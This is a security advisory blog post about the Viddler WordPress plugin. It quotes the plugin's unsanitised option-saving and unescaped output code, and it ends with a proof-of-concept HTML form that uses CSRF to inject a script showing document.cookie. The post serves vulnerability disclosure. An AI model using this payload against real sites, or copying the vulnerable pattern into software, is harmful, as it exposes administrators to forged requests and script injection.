03 Jun

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Viddler WordPress plugin

Recently we have been running in to a lot cases where we are seeing what looks to be hackers probing for the use of WordPress plugins on our websites, for plugins that do not have known vulnerabilities. That has lead to us discover some very serious vulnerabilities in those plugins while trying to figure out what the hackers might be trying to exploit. In one of the latest cases though we think that so far we haven’t discovered what the hacker is trying to exploit, but we did find a lesser security vulnerability.

Recently we had a request for the file /wp-content/plugins/the-viddler-wordpress-plugin/css/viddler-wordpress.css, which is part of the Viddler WordPress plugin. In looking for any known vulnerabilities we found a report of a vulnerability in the plugin, that was strangely include inside of a post about a Joomla extension, Com_Adsmanager.

In looking at though it seems unlikely that someone would be trying to exploit that. While it does allow you to upload arbitrary files, as they are stored in a servers upload_tmp_dir as define by the following line in the file /js/plupload/examples/upload.php:

$targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";

The plugin doesn’t display what the location of that is anywhere, so unless a hacker was able to determine or guess it some other way they would know where the file is. It also looks like that would normally not be somewhere web accessible. It might be possible use directory traversal to put the file in some other location, but that would also require knowing the location of a web accessible directory to be much use. You also might be able to combine it with a local file inclusion (LFI) vulnerability to get make is useful for an exploit.

The other things that seems to point away from that being exploited is that the hacker didn’t just try sending a request directly to that file instead of first checking if the plugin is installed.

While we looked over the plugin for something else that be being exploited, we ran across another vulnerability that also likely wasn’t what was attempted to be exploited, but still is a security risk.

The plugin’s setting page, /wp-admin/options-general.php?page=viddler-comments-config, is susceptible to a cross-site request forgery (CSRF)/cross-site scripting (XSS)  exploit.

The CSRF potion of this is due to a lack of nonce on the page.

For the XSS issue, in the file /viddlercomments.php starting at line 239 settings are saved and there is no sanitization done:

update_option('viddler_player_type_comments', $_POST['viddler_player_type_comments']);
update_option('viddler_player_type_posts', $_POST['viddler_player_type_posts']); update_option('viddler_player_width', $_POST['viddler_player_width']);
update_option('viddler_download_source', $_POST['viddler_download_source']);
update_option('viddler_embed_swapper', $_POST['viddler_embed_swapper']);
update_option('viddler_comment_box_id', $_POST['viddler_comment_box_id']);
update_option('viddler_button_text', $_POST['viddler_button_text']);
update_option('viddler_default_link', $_POST['viddler_default_link']);
update_option('viddler_custom_tags', $_POST['viddler_custom_tags']); 
update_option('viddler_yourusername', $_POST['viddler_yourusername']);
update_option('viddler_yourpassword', $_POST['viddler_yourpassword']);
update_option('viddler_show_widget', $_POST['viddler_show_widget']);

When the values are outputted on the page through the same file they are not escaped. For example, the value for “viddler_custom_tags” is set on line 317:

<p><label for="viddler_custom_tags">Custom tags (separate with commas, no spaces):</label> <input type="text" name="viddler_custom_tags" id="viddler_custom_tags" size="25" value="<?php if (!get_option('viddler_custom_tags')) { echo ''; } else { echo get_option('viddler_custom_tags'); } ?>" /> (<?php _e('<a href="#viddlerfaq-customtags">?</a>'); ?>)</p>

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page. This will occur right after you hit the Submit button when using the Firefox web browser. Other major web browser have XSS filtering, so it will only be shown if you return to /wp-admin/options-general.php?page=viddler-comments-config after having submitted it.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/options-general.php?page=viddler-comments-config" method="post">
<input type="hidden" name="viddler_custom_tags" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.